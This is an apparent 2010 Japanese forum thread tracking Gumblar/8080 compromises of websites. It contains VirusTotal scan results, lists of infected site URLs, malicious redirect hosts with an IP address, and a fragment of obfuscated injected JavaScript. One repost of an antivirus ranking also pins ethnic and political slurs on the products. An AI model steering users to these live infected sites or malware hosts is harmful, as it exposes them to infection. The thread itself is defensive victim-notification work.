2010/04/27(火) 02:18:58やっぱりセキュリティベンダーって信頼に関わるから自社の公式サイトとか配布するツール等は命かけて安全確保してるの?
0130名無しさん@お腹いっぱい。
2010/04/27(火) 08:39:450131名無しさん@お腹いっぱい。
2010/04/27(火) 08:44:59トロイが仕掛けられたクライアントで更新してるから、いくらやってもまた改変されるとかじゃないの?
>>116
さすがにセキュリティー企業なら、インターネットからだれてもコンテンツ更新とか無理じゃねーの?
Webデザイン企業には、CMSとかにしかアクセスできないようにして、
メインサーバへの更新は社員が社内からやってるんじゃね?
0132名無しさん@お腹いっぱい。
2010/04/27(火) 10:21:53リンク先読みって火狐でググッただけで感染するのか?コードまで実行しちゃうの?ノートントラップの類じゃないのか
013362
2010/04/27(火) 10:34:47スカイリンクとかいう会社もケイダッシュもカス。カスが。春日。
0134名無しさん@お腹いっぱい。
2010/04/27(火) 11:58:37http://www.virustotal.com/analisis/65340fefe2ab5d28642c5431a20781f0bd89b3a089802bbb9f77c212dcabb460-1272305909
File www.kdash.jp_common_js_prototype. received on 2010.04.26 18:18:29 (UTC)
Result: 7/40 (17.50%)
Avast 4.8.1351.0 2010.04.26 JS:Illredir-AX
Avast5 5.0.332.0 2010.04.26 JS:Illredir-AX
BitDefender 7.2 2010.04.26 Trojan.JS.Agent.EAL
DrWeb 5.0.2.03300 2010.04.26 JS.Redirector.based.2
F-Secure 9.0.15370.0 2010.04.26 Trojan.JS.Agent.EAL
GData 21 2010.04.26 Trojan.JS.Agent.EAL
nProtect 2010-04-26.01 2010.04.26 Trojan.JS.Agent.EAL
さっき漏れが投げたの
http://www.virustotal.com/analisis/65340fefe2ab5d28642c5431a20781f0bd89b3a089802bbb9f77c212dcabb460-1272336600
File prototype.js received on 2010.04.27 02:50:00 (UTC)
Result: 9/41 (21.96%)
a-squared 4.5.0.50 2010.04.27 Trojan.JS.Agent!IK
Avast 4.8.1351.0 2010.04.26 JS:Illredir-AX
Avast5 5.0.332.0 2010.04.26 JS:Illredir-AX
BitDefender 7.2 2010.04.27 Trojan.JS.Agent.EAL
DrWeb 5.0.2.03300 2010.04.27 JS.Redirector.based.2
F-Secure 9.0.15370.0 2010.04.26 Trojan.JS.Agent.EAL
GData 21 2010.04.27 Trojan.JS.Agent.EAL
Ikarus T3.1.1.80.0 2010.04.27 Trojan.JS.Agent
nProtect 2010-04-26.01 2010.04.26 Trojan.JS.Agent.EAL
>>133
状況を理解してないのかも。
0135名無しさん@お腹いっぱい。
2010/04/27(火) 12:08:20まちがえんな、カス
0136名無しさん@お腹いっぱい。
2010/04/27(火) 12:09:060137名無しさん@お腹いっぱい。
2010/04/27(火) 13:03:470138名無しさん@お腹いっぱい。
2010/04/27(火) 13:46:39Last-Modified: Tue, 27 Apr 2010 04:43:37 GMT : common/js/prototype.js
なおたよ。
0139名無しさん@お腹いっぱい。
2010/04/27(火) 15:47:23キャッシュぐらい消せカスが
0140名無しさん@お腹いっぱい。
2010/04/27(火) 16:51:120141名無しさん@お腹いっぱい。
2010/04/27(火) 18:05:53電子署名ない.exe踏まないとか
フリーソフト殆ど使えないじゃん
0142名無しさん@お腹いっぱい。
2010/04/27(火) 18:26:21インスコ不要なソフト(zip解凍で使えるようなやつ)なら
exeとdllあたりをVirusTotalに投げればだいたいわかるだろ
0143名無しさん@お腹いっぱい。
2010/04/27(火) 18:28:39014462
2010/04/27(火) 19:44:13Google先生のチェッカー使いましたが何か?
そして相変わらず告知無し。こんだけ言われてるのに無視とか新し過ぎる。
メッセサンオー以上だぜ
0145名無しさん@お腹いっぱい。
2010/04/27(火) 20:02:32>>143が言ってるように>>130はexe踏まない=使わないと言ってる件・・・
0146名無しさん@お腹いっぱい。
2010/04/27(火) 20:10:28avastとBitDefender以外のフリーものは駄目だね
0147名無しさん@お腹いっぱい。
2010/04/27(火) 20:23:58bitのフリーは常駐監視ないからGumblar/8080から守れないだろ
0148名無しさん@お腹いっぱい。
2010/04/27(火) 21:03:37そのサイトは安全と見ていいのかな?
0149名無しさん@お腹いっぱい。
2010/04/27(火) 21:06:45IPアドレスの鯖缶:惑星さんからお返事北。
> We appreciate you bringing this matter to our attention. This issue is currently being investigated. Due to privacy policies, we will most likely not be able to provide you with details regarding the outcome of our investigation.
なんて書いてあるのかよくわかんない。。。orz....
日本語でつーほーしたのがいかんかったのかにゃ。
0150名無しさん@お腹いっぱい。
2010/04/27(火) 21:10:38安全と断定はできない。
目安程度で過信は禁物。
ガンブラー以外にも脅威はあるし。
0151名無しさん@お腹いっぱい。
2010/04/27(火) 21:11:49通報ありがとうね
この件は現在調査中だよ
だけどプライバシーの問題で詳細は明かせないよ
って感じ
0153名無しさん@お腹いっぱい。
2010/04/27(火) 21:13:54今から調べちゃる
結果は知らせねぇけどな
0154149
2010/04/27(火) 21:17:26これまたdd
返事がこないとこよりも いい(≧∇≦)b
ぐぐるせーふぶらうじんぐとノートン先生のせーふうぇぶつけたのがよかったのかも。
0155名無しさん@お腹いっぱい。
2010/04/27(火) 21:38:29>>139は多分>>138見て早とちりしたんだと思う。
GMTに9時間足すと日本時間JSTになるので今日の午前11時43分で>>133の1時間後に修復したってことに。
0156名無しさん@お腹いっぱい。
2010/04/27(火) 22:12:24aguseも最近のはスルー率高いしgredも結構スルーする
そんなもんよりとにかく>>2
0157名無しさん@お腹いっぱい。
2010/04/27(火) 23:54:490158名無しさん@お腹いっぱい。
2010/04/28(水) 00:01:51aguseのカスペもVTと同じで旧バージョンなのかね?
0159名無しさん@お腹いっぱい。
2010/04/28(水) 00:11:140160名無しさん@お腹いっぱい。
2010/04/28(水) 03:24:030161名無しさん@お腹いっぱい。
2010/04/28(水) 09:17:230162コテハン ◆8080adndqg
2010/04/28(水) 11:45:13kimiyo-web●srv7●biz/index●html ←???
gex●sexona●net/
0163名無しさん@お腹いっぱい。
2010/04/28(水) 12:00:51http://up3.viploader.net/net/src/vlnet002139.jpg
だとしたら、どうやって本家の証明書を取ってきたら良いのですか?
やり方が分かりません。教えてください。
0164名無しさん@お腹いっぱい。
2010/04/28(水) 12:29:15OKwave、教えてgoo、ヤフー知恵袋にでも行って聞いてこい
0165名無しさん@お腹いっぱい。
2010/04/28(水) 12:39:47PC初心者
http://pc11.2ch.net/pcqa/
初心者の質問
http://gimpo.2ch.net/qa/
Kaspersky internet security Part100.カスペルスキーラボ
http://pc11.2ch.net/test/read.cgi/sec/1272339596/
0166名無しさん@お腹いっぱい。
2010/04/28(水) 12:44:20マカフィーフルスキャンしたけど何も出てこなかったら安心していい?
0168名無しさん@お腹いっぱい。
2010/04/28(水) 16:38:12ログくらい読めチンカス
0169名無しさん@お腹いっぱい。
2010/04/28(水) 18:05:030170名無しさん@お腹いっぱい。
2010/04/28(水) 21:43:10外側からwebページを改ざんするっていうのは
どういう仕組みなの?
なにかそういうソフトがあるんですか?
自分の持ってるwebページが勝手にレイアウトが
変わっちゃったんですけど、これッて誰かのいたずら
ですかね。
0171名無しさん@お腹いっぱい。
2010/04/28(水) 21:44:22いたずらですめばいいけどそういうレベルで済まない場合の方が多いんじゃね
外側からではなく内側からです
0172名無しさん@お腹いっぱい。
2010/04/28(水) 22:04:13どういうこと?
何かウイルスに感染してるってこと?
0173名無しさん@お腹いっぱい。
2010/04/28(水) 22:20:35http://tsushima.2ch.net/test/read.cgi/news/1272445232/86
ν速で検体テストやってるから参加してみ。
0174名無しさん@お腹いっぱい。
2010/04/28(水) 22:29:33DR-350USBの商品ページ入るとなんか変になるけど俺だけかな?
戻っても戻っても戻れないみたいな
スレ違いならごめん
0175U.F.O ◆U.F.OT1DQ2
2010/04/28(水) 23:01:46http://www●rctank●jp/
ガンブラーだと思われ。
0176名無しさん@お腹いっぱい。
2010/04/28(水) 23:05:57その可能性がおおいにある
あとは単純なIDパスワードがアタックされて漏れたとか
>>173
スレ違い
>>174
ブラウザキャシュクリアしてみるとか
0177名無しさん@お腹いっぱい。
2010/04/28(水) 23:08:42ttp://ja.wikipedia.org/wiki/Gumblar
>マルウェアをコンピュータに感染させ、FTPアカウントを攻撃者に送信させる
これってPFWを適切に設定してあればブロックできると思うのだが
マルウェアがPFW回避行動を取るのか?
0178名無しさん@お腹いっぱい。
2010/04/28(水) 23:10:02さいごのとこに難読化無しでframeのが入っとるね
0179名無しさん@お腹いっぱい。
2010/04/28(水) 23:17:15止めちゃうんじゃね
0180名無しさん@お腹いっぱい。
2010/04/28(水) 23:17:44これがバーニング系か。
ニュースにもならんし。
0181名無しさん@お腹いっぱい。
2010/04/28(水) 23:18:11www●militarize●org/01.htm
一回失敗してるような感じのコードが見える
0182U.F.O ◆U.F.OT1DQ2
2010/04/28(水) 23:19:18http://bentominowa●web●fc2●com/
この後にあるURLも感染を確認・・・
概出だったら土下座します。
0183名無しさん@お腹いっぱい。
2010/04/28(水) 23:33:27確認できないな
修正はいったかな
0184名無しさん@お腹いっぱい。
2010/04/29(木) 00:00:08日本語URLうざい…
>>183
gredに仕掛けてみれ
0185名無しさん@お腹いっぱい。
2010/04/29(木) 00:04:28>>181
>>182
>>184
どれも確認できないのだが。
飛び先のチェック by ぴょん基地の友達
http://www.kakiko.com/check/sample.html
0186名無しさん@お腹いっぱい。
2010/04/29(木) 00:12:55xn--はdanさんとこで確認できた
0187名無しさん@お腹いっぱい。
2010/04/29(木) 00:13:45injection_graph_func.js
0188名無しさん@お腹いっぱい。
2010/04/29(木) 00:20:190189名無しさん@お腹いっぱい。
2010/04/29(木) 00:34:160190名無しさん@お腹いっぱい。
2010/04/29(木) 01:17:59/mobile-info/
/mobile-info/
/mobile-info/common/js/jquery●js
/mobile-info/common/js/jquery-auto●js
既出だったらごめんよ
そういや皆さま連休はどのようにお過ごしで?
0191名無しさん@お腹いっぱい。
2010/04/29(木) 02:05:35うんこがたくさんあるね
0192名無しさん@お腹いっぱい。
2010/04/29(木) 03:55:06Aguseで見ると外部と接続するオブジェクトに
helphomecare■at:8080/google■com/download■com/qip■ru■php
がある。
JSファイルの中身だけやられてるらしい。
bentominowa■web■fc2■com/index_files/kotypeb_data/injection_graph_func■js
/*LGPL*/
function E(){ で始まるやつで数字のメモがついてない
0193名無しさん@お腹いっぱい。
2010/04/29(木) 04:04:16ttp://www.jpcert.or.jp/at/2010/at100011.txt
いわゆる Gumblar ウイルスによって
ダウンロードされる DDoS 攻撃を行うマルウエアに関する注意喚起
JPCERT/CC では感染するマルウエアの中に新たに DDoS 攻撃を行うものが追加
された事を確認しました。
このマルウエアに感染すると、使用している PC が国内外の企業や組織に対
して、DDoS 攻撃を行う可能性があります。
0194名無しさん@お腹いっぱい。
2010/04/29(木) 06:19:44http://www.cascadialabs.com/clients.html#examples
┌── Overall(総合)30ケース
│ ┌── In-the-Wild
│ │ ┌── CORE IMPACT
30 = (15) + (15)
| .100%| .100%| .100%| Norton Internet Security 2009
| . .57%| . .60%| . .53%| AVG Internet Security 8.0
| . .46%| . .60%| . .33%| McAfee Internet Security 2009
| . .37%| . .53%| . .20%| Kaspersky Internet Security 2009
| . .27%| . .40%| . .13%| Trend Micro Internet Security 2009
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
2008年9月-10月に行われた結果。
http://www.cascadialabs.com/reports/WebThreats09_Summary.pdf
0195名無しさん@お腹いっぱい。
2010/04/29(木) 07:53:47どれもGumblarをろくに検出できないやつばっかりじゃん
0196名無しさん@お腹いっぱい。
2010/04/29(木) 08:59:02http://www.itmedia.co.jp/enterprise/articles/1004/27/news075.html
0197名無しさん@お腹いっぱい。
2010/04/29(木) 09:07:55http://www.securebrain.co.jp/about/news/2010/04/gred-bot.html
0198名無しさん@お腹いっぱい。
2010/04/29(木) 09:08:32最新はこちら
【AV-Testによる検出率テスト】3月分発表 マカフィーが転落
AV-TESTによる毎月恒例のウイルス検出率テストの3月分結果が発表になった。テストは今回で30回目となる。
2位と3位が入れ替わり。Symantecが2ヶ月連続でランクをあげた。McAfeeは転落した。
4位、5位、6位は先月と変わらずK7とEset、Microsoftがキープ。
Kasperskyは検出率を落とし、TrendMciroが8位に転落。
9位、10位は変わらず、AVGとRisingだった。
順位 ベンダー 検出数 検出率
# Symantec 630,754 98.46% 谷垣
# McAfee 628,906 98.18% 公明
---
# K7 Computing 616,025 96.17% 在日
# Eset Nod32 610,787 95.35% 小沢
# Microsoft 609,523 95.15% 創価
---
# Kaspersky 606,897 94.74% 鳩山
# Trend Micro 604,908 94.43% 蓮舫
# AVG 597,580 93.29% 徳之島
---
# Rising 555,879 86.78% 朝鮮人
テスト実施機関: AV-TEST.org
マルウェア総数: 640,591
(検体の内訳)
バックドア: 85,856
ボット: 43,658
トロイの木馬: 407,043
狭義のウイルス: 37,606
ワーム: 66,428
テスト日: 2010年4月26日
テスト対象: 国内でよく知られているウイルス対策ソフト10製品(うち、MicrosoftとAVGは無料版)
*テストの対象は、国内で流通している主要ウイルス対策ソフト。なお「Microsoft」は、MSE(Microsoft Security Essentials)。
0199名無しさん@お腹いっぱい。
2010/04/29(木) 10:49:15>どれもGumblarをろくに検出できないやつばっかりじゃん
できるよ
Gumblarもドライブバイダウンロードだしね
スクリプト検出しないからダメなんてことはない
0200名無しさん@お腹いっぱい。
2010/04/29(木) 11:45:47診断して欲しいならURLかけよ
0201名無しさん@お腹いっぱい。
2010/04/29(木) 12:55:03ダメとまでは言わないが、攻撃の段階が進んでからじゃないと止められないってことだから
スクリプト段階で止められるものより危険性が高いんじゃないか?
0202名無しさん@お腹いっぱい。
2010/04/29(木) 14:16:27↓
リダイレクト先のURLをブロックした→○
↓
落ちてくるファイルを検出した→△(※)
※対策済の場合は何も落ちてこない
↓
AdobeやJAVAが起動したり、HDDがゴリゴリ・・→×
○=安全
△=対策漏れ有(環境を見直すべき)
×=\(^o^)/オワタ
0203名無しさん@お腹いっぱい。
2010/04/29(木) 14:18:44何問題ない
0204名無しさん@お腹いっぱい。
2010/04/29(木) 14:20:02攻撃を受けないんだから問題ない
スクリプトだけで防御するよりずっと堅牢
0205名無しさん@お腹いっぱい。
2010/04/29(木) 14:24:59ダウンロードされるものも脆弱性を利用する攻撃のためのものやマルウェア本体などもある
あんまり分かってないのに不安を煽るな
0206名無しさん@お腹いっぱい。
2010/04/29(木) 14:28:00未だにフルスキャンかけても何も引っかからないんだが
運がいいのか悪いのか
つうか、本当に有効な8080踏んだんだろうか
実はまともに動いてない地雷だったんだろうか
こんな微妙な状況ではクリーンインスコする気になれん
0207名無しさん@お腹いっぱい。
2010/04/29(木) 14:29:29スクリプトなんて検出しなくても
攻撃に使われる脆弱性を利用しようとするのを検出ブロックするから
だから初期からガンブラーも防御できた
0208名無しさん@お腹いっぱい。
2010/04/29(木) 14:35:57今はスクリプト検出可否スレになってるからな
0209名無しさん@お腹いっぱい。
2010/04/29(木) 14:38:44スクリプトが発見されてもされなくてもどちらでもいい。
0210コテハン ◆8080adndqg
2010/04/29(木) 14:49:27www●hd-cre●com/ab-tz/
san●ron5●com/gbl/
marukin-gohuku●hp●infoseek●co●jp/komono/index●html
0211名無しさん@お腹いっぱい。
2010/04/29(木) 15:28:06firefoxのリンク先読み機能切ってない場合アウト?
0212名無しさん@お腹いっぱい。
2010/04/29(木) 15:47:41事前に>>2の対策がきちんとできていればセーフ。
0213名無しさん@お腹いっぱい。
2010/04/29(木) 16:26:27相変わらず信用ならんテストだなあ
ところで特に中身は無くていいからHP立ち上げて置けば自分が感染してないか指標の一つになる様な気がするんだけど
HPって立ち上げるのメンドイの?
0214名無しさん@お腹いっぱい。
2010/04/29(木) 18:03:390215名無しさん@お腹いっぱい。
2010/04/29(木) 18:08:29心配なら先読み機能を切る。「 firefox 先読み 無効 」でググりゃんせ。
0216名無しさん@お腹いっぱい。
2010/04/29(木) 18:13:29kimiyo-web●srv7だが、何か足りなくね?
0217名無しさん@お腹いっぱい。
2010/04/29(木) 18:35:30本当だな?心配ないんだな?信じていいんだな?
0218215
2010/04/29(木) 18:49:230219名無しさん@お腹いっぱい。
2010/04/29(木) 18:51:410220名無しさん@お腹いっぱい。
2010/04/29(木) 19:03:040221名無しさん@お腹いっぱい。
2010/04/29(木) 19:13:03逆にちょっとでも怪しい状況なら
さっさとクリーンインスコして不安要素を取り除いた方が精神的にいいと思うんだが
0222名無しさん@お腹いっぱい。
2010/04/29(木) 19:39:04データのバックアップ2年近くサボってたんだよ
今更退避しても感染してたら意味ないし
サイトは殆ど動いてないのを一つ持ってて、FFFTP使ってたけど
結局現在にいたるまで改竄の形跡はなし
でもMP3データをCからDに移すだけで、何か謎のエラー(使用中って出た。使ってねえよ)
出たりして、微妙に調子悪い
かといってHDD動きまくってるわけでも、起動が重く、遅くなってるわけでもない
カスペオンラインでも何も出てこない。WINうpだては問題なくできる
ベンダーのサイトにも繋がる
もうどこで感染判定していいのかワカンネ
0223名無しさん@お腹いっぱい。
2010/04/29(木) 21:22:15http://www.cascadialabs.com/clients.html#examples
┌── Overall(総合)30ケース
│ ┌── In-the-Wild
│ │ ┌── CORE IMPACT
30 = (15) + (15)
| .100%| .100%| .100%| Norton Internet Security 2009
| . .57%| . .60%| . .53%| AVG Internet Security 8.0
| . .46%| . .60%| . .33%| McAfee Internet Security 2009
| . .37%| . .53%| . .20%| Kaspersky Internet Security 2009
| . .27%| . .40%| . .13%| Trend Micro Internet Security 2009
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
2008年9月-10月に行われた結果。
http://www.cascadialabs.com/reports/WebThreats09_Summary.pdf
0224名無しさん@お腹いっぱい。
2010/04/30(金) 00:39:13全部消してOS入れなおせばすっきり!
0225名無しさん@お腹いっぱい。
2010/04/30(金) 01:24:02移動出来ないMP3を救済したいのならファイルロックの解除ツールを
試してみてはどうか、UNLOCKERが便利、何にロックされてるかも判るよ
ってそういう話じゃないのか、すまない
知らない間にpre21がウイルスを駆除したっぽい、aguse、gredは反応せず
ちゃんと告知しようよ…
あと、www●kagayaki-t●co●jpがスクリプト系の何かに感染してたみたい
0226名無しさん@お腹いっぱい。
2010/04/30(金) 01:25:59×告知 ○公表
0227名無しさん@お腹いっぱい。
2010/04/30(金) 03:19:14ゲイシのキャッシュ見たらここだぬ。
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=myfucking%2Dpussy%2Ecom
ttp://www.siteadvisor.com/sites/myfucking-pussy.com
gnomeさんとこに紹介されてたお。
Zbotかぁ。。。
0228名無しさん@お腹いっぱい。
2010/04/30(金) 03:22:34他のキャッシュみたら難読化されてないのがあたー。。。
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=antivirusys.ru
ttp://safeweb.norton.com/report/show?url=antivirusys.ru
ttp://www.siteadvisor.com/sites/antivirusys.ru
0229名無しさん@お腹いっぱい。
2010/04/30(金) 03:31:01他にもあたー
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=xsp.in.ua
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=akrosi.ru
( ゚Д゚)ネムヒー
0230名無しさん@お腹いっぱい。
2010/04/30(金) 04:01:56わざわざ探してくださったのですか、ありがとうございます
Gumblar/8080系ではなかったようですね
スクリプト見ただけじゃどれがどれやらさっぱりだ…
0231名無しさん@お腹いっぱい。
2010/04/30(金) 04:06:08>>227はURLエンコードにゃ。
0232名無しさん@お腹いっぱい。
2010/04/30(金) 04:12:37ゴメンもひとつ難読化されてたの見てなかった。上のほうにあるのに…orz....
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=personalsystemscan.cn
ttp://www.siteadvisor.com/sites/personalsystemscan.cn
0233名無しさん@お腹いっぱい。
2010/04/30(金) 08:17:28ありがとう。でも、移動は一応出来てるらしい
エラーメッセージとカラのフォルダが残るだけで
AdobeReaderの更新も、何故か一発でいけなかったんだよな・・・
そのままファイル移動できず・更新できず、だと諦めて初期化するか
オフライン専用機にする諦めも付くんだが・・・
>>224
すっきりしたいが、撮り貯めた写真だのなんだの大量にあるからすっきりできねえよ
0234名無しさん@お腹いっぱい。
2010/04/30(金) 10:01:34KatesKiller
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
0235名無しさん@お腹いっぱい。
2010/04/30(金) 13:05:46【陥落サイトのURL悪用厳禁】
www●m-gcomm●jp
ivisit-corp●com/company/
stargatepcmaru●com/ual0g/
deaicafe●org/hito332/
kagaden●com/reiai/ :gredでチェック入れて見ると他にも…
0236名無しさん@お腹いっぱい。
2010/04/30(金) 13:26:56これはどこに埋め込まれてるの?
0237名無しさん@お腹いっぱい。
2010/04/30(金) 13:32:30HDDが物理的にあやしいんでね?
バックアップ早めにしたほうがいいかも
0238名無しさん@お腹いっぱい。
2010/04/30(金) 13:32:45/js/rollover.js
/js/popup.js
0239名無しさん@お腹いっぱい。
2010/04/30(金) 13:33:45popup.js
rollover.js
0240名無しさん@お腹いっぱい。
2010/04/30(金) 13:36:300241名無しさん@お腹いっぱい。
2010/04/30(金) 14:01:07確認できる方法は?
0242名無しさん@お腹いっぱい。
2010/04/30(金) 14:02:37danさんとこで見れたよ
0243名無しさん@お腹いっぱい。
2010/04/30(金) 14:04:15gredはcompanyで黒判定
0244名無しさん@お腹いっぱい。
2010/04/30(金) 14:05:040245名無しさん@お腹いっぱい。
2010/04/30(金) 14:11:03/jsのURLミスってるとおもう
gredでcompanyを見ればわかるよ
0246名無しさん@お腹いっぱい。
2010/04/30(金) 14:21:39【陥落サイトのURL悪用厳禁】
tukaoh●com
ekisupa●visual-imp●net :GWにこれはまずくないか…?
0247名無しさん@お腹いっぱい。
2010/04/30(金) 14:32:02放置アフィサイトじゃないかなこれ
0248名無しさん@お腹いっぱい。
2010/04/30(金) 14:44:22放置されてるんだorz
だめもとでメル凸しときます
上のサイトにも全部送らないとねえ、見つけりゃ見つけたで大変だ…
0249名無しさん@お腹いっぱい。
2010/04/30(金) 14:53:070250名無しさん@お腹いっぱい。
2010/04/30(金) 14:53:49そんなときもあるさ
0251名無しさん@お腹いっぱい。
2010/04/30(金) 14:57:31何の攻撃も受けてないから
0252名無しさん@お腹いっぱい。
2010/04/30(金) 15:07:38最悪ノートンスルーで感染してても、自覚があるなら調べればすぐわかるって
0253名無しさん@お腹いっぱい。
2010/04/30(金) 17:13:46これの「企業情報」でAVGが反応するんだけど何?
0254名無しさん@お腹いっぱい。
2010/04/30(金) 17:26:48www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.mystic-rugby.com%2F
やられてるね
0255名無しさん@お腹いっぱい。
2010/04/30(金) 17:58:57そのサイトはマルチ商法の末期のもので、つい先日集団訴訟が始まったところです。
これは、サイト閉鎖の理由にするためにわざとしたのか、たまたま外部から攻撃されたのかとかわかる?
0256名無しさん@お腹いっぱい。
2010/04/30(金) 18:29:41http://pc.nikkeibp.co.jp/article/news/20100428/1024614/
「.ru」ドメイン対策では防げない「Gumblar」攻撃 - マルウェア配布サイトに「.com」などが
http://www.security-next.com/012509.html
0257名無しさん@お腹いっぱい。
2010/04/30(金) 19:01:06なんで企業情報だけ別ドメインなんだろうね
>>255
わからんよ
ただjava1.jsというファイル名はいろいろ不安になる
0258253
2010/04/30(金) 19:22:00http://www.mystic-rugby.com/info.html
あと、「採用情報」のところも反応するので、調べたら以前のリンクはここのよう。
http://www.micro-opt.com/baito.html
以前のリンクはどちらも感染してないのは、復旧を簡単にするためかな?
0259名無しさん@お腹いっぱい。
2010/04/30(金) 19:43:20そんなことはどうでもいいから>>1読めよ
0260名無しさん@お腹いっぱい。
2010/04/30(金) 19:48:13www●micro-opt●com トップがやられてる
全ページ改ざんされるわけじゃない
意図的だと思いたいなら勝手に思えばいいけど他人に迷惑かけないでくれ
0261253
2010/04/30(金) 19:56:420262名無しさん@お腹いっぱい。
2010/05/01(土) 04:50:25【陥落サイトのURL悪用厳禁】
myako●net :再改竄ですかね、ここ
www●m-gcomm●jp :.jsに残ってたので再メル凸しときました
ivisit-corpは閉鎖した模様…再開するならちゃんと公表してほしい
そういえばkdashもpre21も全然公表してくれないなあ…
2chで晒されちゃったし、隠しても良い事ないと思うんだけど
0263名無しさん@お腹いっぱい。
2010/05/01(土) 12:23:36確認できないお
0264名無しさん@お腹いっぱい。
2010/05/01(土) 12:51:50ってのがやられてる
ほかにもあるかも
0265名無しさん@お腹いっぱい。
2010/05/01(土) 12:53:500266名無しさん@お腹いっぱい。
2010/05/01(土) 13:00:590267名無しさん@お腹いっぱい。
2010/05/01(土) 18:57:140268名無しさん@お腹いっぱい。
2010/05/01(土) 19:35:440269名無しさん@お腹いっぱい。
2010/05/01(土) 19:57:07AdobeReaderのは最近追加&自分で設定する必要あり。
0270名無しさん@お腹いっぱい。
2010/05/02(日) 00:04:120271名無しさん@お腹いっぱい。
2010/05/02(日) 00:36:390272名無しさん@お腹いっぱい。
2010/05/02(日) 01:30:16あるに越したことはないが、どうせ>>2がきっちりできていれば攻撃は空振りになるので
有利なんて言えるほどの価値はない。
0273名無しさん@お腹いっぱい。
2010/05/02(日) 02:08:56ttp://www●freaks.ne●jp/honten/index●shtml
を見てたらEssentialsが反応してたんだけど
感染してる?
0274名無しさん@お腹いっぱい。
2010/05/02(日) 02:17:570275名無しさん@お腹いっぱい。
2010/05/02(日) 02:18:13gredによるとGumblar Generic (GJS055)
danさんとこで見たけどわからんかった
0276名無しさん@お腹いっぱい。
2010/05/02(日) 02:20:07なるほど。わかったthx
5行追加されててこれは相当やばいな
Last-Modified: Sat, 24 Oct 2009 02:01:08 GMT
0277名無しさん@お腹いっぱい。
2010/05/02(日) 03:09:29無差別爆撃からjsファイル狙い撃ちに切り替えたのかな
0278名無しさん@お腹いっぱい。
2010/05/02(日) 13:02:55ampmda●com
harappa-h●org/AtoZ
0279名無しさん@お腹いっぱい。
2010/05/02(日) 13:10:280280名無しさん@お腹いっぱい。
2010/05/02(日) 14:23:29これaguseで検出しないのにavastはガンブラー認定する
どっちが正しいのか
0281名無しさん@お腹いっぱい。
2010/05/02(日) 14:39:05そういうときは黒の結果を信用すべきでしょ
黒だと思ってりゃそれが間違っててもHP見れないだけだが
白だと思って実は黒でしたなんて事になったら目も当てられない
aguseはカスペだったと思うけどVTのカスペがバージョン古い事考えると
aguseも旧バージョンなんじゃね?と妄想
0282名無しさん@お腹いっぱい。
2010/05/02(日) 14:47:14全部黒だよ
0283名無しさん@お腹いっぱい。
2010/05/02(日) 14:58:31aguseはスルー多い
最近のはほとんどスルーされる
0284名無しさん@お腹いっぱい。
2010/05/02(日) 14:58:460285名無しさん@お腹いっぱい。
2010/05/02(日) 18:50:190286名無しさん@お腹いっぱい。
2010/05/02(日) 19:08:34ここも放置ですね
0287名無しさん@お腹いっぱい。
2010/05/02(日) 20:22:500288名無しさん@お腹いっぱい。
2010/05/03(月) 11:31:31Gumblar/8080 Checker
ttp://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/
ここは最近のやつにも強いかな?
0289名無しさん@お腹いっぱい。
2010/05/03(月) 12:18:58ampmda●com
http://rd.or.tp//get.php?site=ampmda.com&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none
http://www.virustotal.com/jp/analisis/8d93920eeef9346c87da08e7c555cb436b60f9b11b2c5610cf8007df14352996-1272856449
判断はお任せします
0290名無しさん@お腹いっぱい。
2010/05/03(月) 12:25:46検出できないやつを引っ張ってきただけで新型かどうか俺わかんないし
10社以上が検出してるやつでもそこでは引っかからないかもしんない
0291名無しさん@お腹いっぱい。
2010/05/03(月) 12:31:42http://www.youtube.com/watch?v=5JicOE2A5hg&fmt=34
0292名無しさん@お腹いっぱい。
2010/05/03(月) 12:39:04(”http5GIu”.substr(0,4)+”://w”+”ebguRx2”.substr(0,4)+”idet”+”v●in”+”fo:”))
↓
-> http://webguidetv●info:
62●67●246●113
0293名無しさん@お腹いっぱい。
2010/05/03(月) 16:07:32どれも過信は禁物
一般ユーザーは>>2をやっとけばいい
0294名無しさん@お腹いっぱい。
2010/05/03(月) 17:22:39ググるだけで感染することはありえるのですか
0295名無しさん@お腹いっぱい。
2010/05/03(月) 17:31:210296名無しさん@お腹いっぱい。
2010/05/03(月) 17:41:120297名無しさん@お腹いっぱい。
2010/05/03(月) 17:49:550298名無しさん@お腹いっぱい。
2010/05/03(月) 17:50:05あと右クリックしてリンクをブックマークとか名前を付けて保存とか間違って選択しただけでもヤバイ
履歴に残ってるから何らかのアクセスはしてる
0299名無しさん@お腹いっぱい。
2010/05/03(月) 18:02:09なぜ未だに被害がおさまらないのか
0300名無しさん@お腹いっぱい。
2010/05/03(月) 18:15:400301名無しさん@お腹いっぱい。
2010/05/03(月) 19:52:390302名無しさん@お腹いっぱい。
2010/05/03(月) 20:02:420303名無しさん@お腹いっぱい。
2010/05/03(月) 20:09:58YouTube等利用する時には面倒だけど
0304名無しさん@お腹いっぱい。
2010/05/03(月) 20:25:55ドメインによって判断するタイプでも本人が判断できなければ意味がないしなあ
0305名無しさん@お腹いっぱい。
2010/05/03(月) 20:28:200306名無しさん@お腹いっぱい。
2010/05/03(月) 20:42:21良いか悪いかで言えば「良い」ではある
利便性を断てば断つほど安全性が上がるのは間違いないし
0307名無しさん@お腹いっぱい。
2010/05/03(月) 21:50:54ダメなんかと思って、ようつべとか、わざわざその時だけオンにしてたのに
0308名無しさん@お腹いっぱい。
2010/05/03(月) 22:08:10変に重いブログパーツとか広告とか読みこまなくても済むんだし
0309名無しさん@お腹いっぱい。
2010/05/03(月) 22:12:050310名無しさん@お腹いっぱい。
2010/05/03(月) 22:12:48スクリプト必須なサイトなんか余り無かったから余裕だったんだけど
